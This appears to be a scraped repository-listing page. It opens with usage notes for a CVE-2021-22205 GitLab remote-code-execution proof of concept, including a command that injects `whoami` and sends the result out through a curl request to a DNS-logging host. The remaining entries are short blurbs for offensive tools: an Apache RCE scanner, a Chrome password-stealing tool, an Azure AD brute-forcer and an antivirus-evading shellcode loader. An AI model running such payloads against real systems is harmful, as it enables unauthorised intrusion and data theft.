影响版本:
Usage
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
获取csrf-token:
通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce
ref:
Printjack-Phonejack This repository contains the source code of the printjack and phonejack attacks. The Printjack directory contains the script to ca
TTUN Server The self-hostable proxy tunnel. Running Running: docker run -e TUNNEL_DOMAIN=Your tunnel domain -e SECURE=True if using SSL ghcr.io/to
Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha
✔️ Gerador e Validador de CPF Programa que gera e valida números de CPF Requisitos • Como usar • Capturas de Tela Requisitos Antes de começar, você va
s3-leaks List of AWS S3 Leaks Feel free to send in a PR if you know of other leaks Date Description Notes Aug2020 S3 bucket mess up exposed 182GB of s
fpmachine python driver for fingerprint machine (ZKTeco biometrics) support until now 2 model supported and tested ZMM100_TFT and ZMM220_TFT install p
CVE-2021-29440 Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10 Grav is a file based Web-platform. Twig processing of static p
ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse
ezNTFS ezNTFS is an easy-to-use wrapper for NTFS-3G on macOS. ezNTFS can be used as a menu bar app, or via the CLI in the terminal. Installation To us
This is A Python & Bash Programming Based Termux-Tool Created By CRACKER911181. This Tool Created For Hacking and Pentesting. If You Use This Tool To Evil Purpose,The Owner Will Never be Responsible
ChromePE [Linux/Windows] Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, download
Brute force attack tool for Azure AD Autologon
CloudFlare reconnaissance, tries to uncover the IP behind CF.
IMPORTANT: Please contact us before you use any styling or content shown here! Cyber FastTrack Spring 2021 / National Cyber Scholarship Competition -
python写的一款免杀工具(shellcode加载器)BypassAV,国内杀软全过(windows denfend)
CVE-2021-36260-metasploit the metasploit script(POC) about CVE-2021-36260. A command injection vulnerability in the web server of some Hikvision produ
CVE-2022-23046 PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL s
BloodyAD Framework BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combi
Driver Buddy Reloaded Quickstart Table of Contents Installation Usage About Driver Buddy Reloaded Finding DispatchDeviceControl Labelling WDM & WDF St
可可萝病毒! 事情是这样的,我又开始不干正事了。 众所周知,在Python里,0x0等于0,但是不等于可可萝。 这很不好,我们得把它改成可可萝! 效果 一般的Python—— Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC
2 Feb 12, 2022
2 Jan 11, 2022
213 Dec 30, 2022
1 Nov 07, 2021
291 Dec 28, 2022
4 Oct 06, 2022
6 Oct 10, 2022
3 Dec 04, 2022
34 Dec 01, 2022
1 Jan 10, 2022
3 Oct 05, 2022
89 Jan 02, 2023
8 Dec 03, 2021
48 Aug 28, 2022
266 Jan 02, 2023
14 Nov 09, 2022
2 Feb 15, 2022
757 Jan 07, 2023
199 Jan 04, 2023
29 Jul 14, 2022